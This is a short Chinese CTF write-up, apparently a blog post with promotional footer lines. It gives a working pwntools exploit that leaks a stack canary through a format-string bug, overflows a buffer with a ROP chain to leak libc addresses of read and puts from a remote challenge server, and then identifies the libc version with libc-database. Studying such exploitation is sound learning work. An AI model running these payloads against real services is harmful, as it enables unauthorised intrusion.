记录下学到的姿势,利用信息泄露得到服务器libc 至少两个函数偏移,利用libc-databse得到服务器libc版本

传送门

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

泄露脚本如下

from pwn import *

context.log_level='DEBUG'

r=remote('ctf2.linkedbyx.com',10755)
#r=process('./story')
elf=ELF('./story')

'''
rop_chain=
payload='a'*0x90+canary+'b'*8+rop_chain
r.sendlineafter('Tell me the size of your story:',payload)
'''

'''
0x0000000000400bd3 : pop rdi ; ret
'''

main=0x0000000000400876

r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(18),16)
success('canary:'+hex(canary))

payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','1024')
r.sendlineafter(':',payload)
read=r.recv(12)
print read
#success('read:'+hex(read))

#r.interactive()

r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(18),16)
success('canary:'+hex(canary))

payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','1024')
r.sendlineafter(':',payload)
puts=r.recv(12)
print puts

r.interactive()

之后./find read 250 puts 690即可泄露服务器libc

root@snip3r:~/libc-database# ./find read 250 puts 690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)

有了libc直接构造ROP即可

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄